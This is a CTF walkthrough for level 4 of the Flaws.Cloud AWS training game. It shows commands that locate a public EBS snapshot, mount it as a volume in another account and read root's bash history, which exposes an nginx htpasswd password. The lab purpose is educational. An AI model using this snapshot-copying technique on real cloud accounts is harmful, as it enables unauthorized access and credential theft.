Level 4
A CTF walkthrough for level 4 of Flaws.Cloud
Last updated
aws --profile flaws ec2 describe-snapshots --query "Snapshots[?contains(OwnerId, '975426262029')]"
[
{
"Description": "",
"Encrypted": false,
"OwnerId": "975426262029",
"Progress": "100%",
"SnapshotId": "snap-0b49342abd1bdcb89",
"StartTime": "2017-02-28T01:35:12+00:00",
"State": "completed",
"VolumeId": "vol-04f1c039bc13ea950",
"VolumeSize": 8,
"Tags": [
{
"Key": "Name",
"Value": "flaws backup 2017.02.27"
}
],
"StorageTier": "standard"
}
]aws --profile dev ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89ssh -i ~/Downloads/tyler-flaws.pem ec2-user@ec2-34-213-130-176.us-west-2.compute.amazonaws.com[ec2-user@ip-172-31-33-199 ~]$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
xvda 202:0 0 8G 0 disk
├─xvda1 202:1 0 8G 0 part /
├─xvda127 259:0 0 1M 0 part
└─xvda128 259:1 0 10M 0 part /boot/efi
xvdb 202:16 0 8G 0 disk
└─xvdb1 202:17 0 8G 0 part [ec2-user@ip-172-31-33-199 ~]$ sudo file -s /dev/sdb
/dev/sdb: symbolic link to xvdb[ec2-user@ip-172-31-33-199 ~]$ sudo mount /dev/xvdb1 /datacd /data/[ec2-user@ip-172-31-33-199 data]$ sudo cat root/.bash_history
[snip]
echo dog | htpasswd -p /etc/nginx/.htpasswd -b flaws
htpasswd -p /etc/nginx/.htpasswd -b flaws dpg
htpasswd -b -p /etc/nginx/.htpasswd flaws dpg
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
[snip]